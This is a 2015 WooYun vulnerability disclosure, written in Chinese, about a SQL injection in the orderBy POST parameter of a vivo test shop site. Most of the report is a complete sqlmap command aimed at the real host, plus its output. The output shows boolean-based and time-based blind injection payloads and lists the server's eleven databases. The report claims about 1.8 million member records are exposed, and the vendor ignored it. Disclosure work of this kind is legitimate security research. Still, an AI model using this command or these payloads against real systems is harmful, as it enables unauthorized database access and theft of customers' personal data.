当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151543

漏洞标题:vivo某站sql注入可影响180W会员

相关厂商:vivo智能手机

漏洞作者: 路人甲

提交时间:2015-11-03 17:06

修复时间:2015-11-08 17:08

公开时间:2015-11-08 17:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-03: 细节已通知厂商并且等待厂商处理中
2015-11-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

这是一个测试网站http://shop1.vivo.com.cn,但是数据库用户权限很大,可夸12个库,有zabbix,cacti,还有shop的等等

PS C:\sqlmap-master> python sqlmap.py -u "http://shop1.vivo.com.cn/gallery-ajax_get_goods.html" --data="cat_id=22&orderB
y=1&showtype=list&&virtual_cat_id=" -porderBy --risk 3 --random-agent --dbs --thread 5
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151020}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user'
s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 13:46:16
[13:46:16] [INFO] fetched random HTTP User-Agent header from file 'C:\sqlmap-master\txt\user-agents.txt': 'Mozilla/5.0 (
Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0'
[13:46:16] [INFO] resuming back-end DBMS 'mysql'
[13:46:16] [INFO] testing connection to the target URL
[13:46:17] [INFO] heuristics detected web page charset 'ISO-8859-2'
[13:46:17] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: orderBy (POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: cat_id=22&orderBy=(SELECT (CASE WHEN (8230=8230) THEN 8230 ELSE 8230*(SELECT 8230 FROM INFORMATION_SCHEMA.C
HARACTER_SETS) END))&showtype=list&&virtual_cat_id=
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cat_id=22&orderBy=1 AND (SELECT * FROM (SELECT(SLEEP(5)))NPOW)&showtype=list&&virtual_cat_id=
---
[13:46:19] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.27
back-end DBMS: MySQL 5.0
[13:46:19] [INFO] fetching database names
[13:46:19] [INFO] fetching number of databases
[13:46:19] [INFO] retrieved: 11
[13:46:21] [INFO] retrieving the length of query output
[13:46:21] [INFO] retrieved: 18
[13:46:59] [INFO] retrieved: information_schema
[13:46:59] [INFO] retrieving the length of query output
[13:46:59] [INFO] retrieved: 5
[13:47:09] [INFO] retrieved: cacti
[13:47:09] [INFO] retrieving the length of query output
[13:47:09] [INFO] retrieved: 7
[13:47:25] [INFO] retrieved: ecstore
[13:47:25] [INFO] retrieving the length of query output
[13:47:25] [INFO] retrieved: 5
[13:47:37] [INFO] retrieved: mysql
[13:47:37] [INFO] retrieving the length of query output
[13:47:37] [INFO] retrieved: 18
[13:48:19] [INFO] retrieved: performance_schema
[13:48:19] [INFO] retrieving the length of query output
[13:48:19] [INFO] retrieved: 7
[13:48:41] [INFO] retrieved: seckill
[13:48:41] [INFO] retrieving the length of query output
[13:48:41] [INFO] retrieved: 4
[13:48:51] [INFO] retrieved: test
[13:48:51] [INFO] retrieving the length of query output
[13:48:51] [INFO] retrieved: 14
[13:49:30] [INFO] retrieved: test_php568cms
[13:49:30] [INFO] retrieving the length of query output
[13:49:30] [INFO] retrieved: 8
[13:49:52] [INFO] retrieved: vivo_chk
[13:49:52] [INFO] retrieving the length of query output
[13:49:52] [INFO] retrieved: 10
[13:50:26] [INFO] retrieved: vivo_store
[13:50:26] [INFO] retrieving the length of query output
[13:50:26] [INFO] retrieved: 6
[13:50:40] [INFO] retrieved: zabbix
available databases [11]:
[*] cacti
[*] ecstore
[*] information_schema
[*] mysql
[*] performance_schema
[*] seckill
[*] test
[*] test_php568cms
[*] vivo_chk
[*] vivo_store
[*] zabbix
[13:50:40] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\shop1.vivo.com.cn'


看一下shop会员数量

180w.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-08 17:08

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无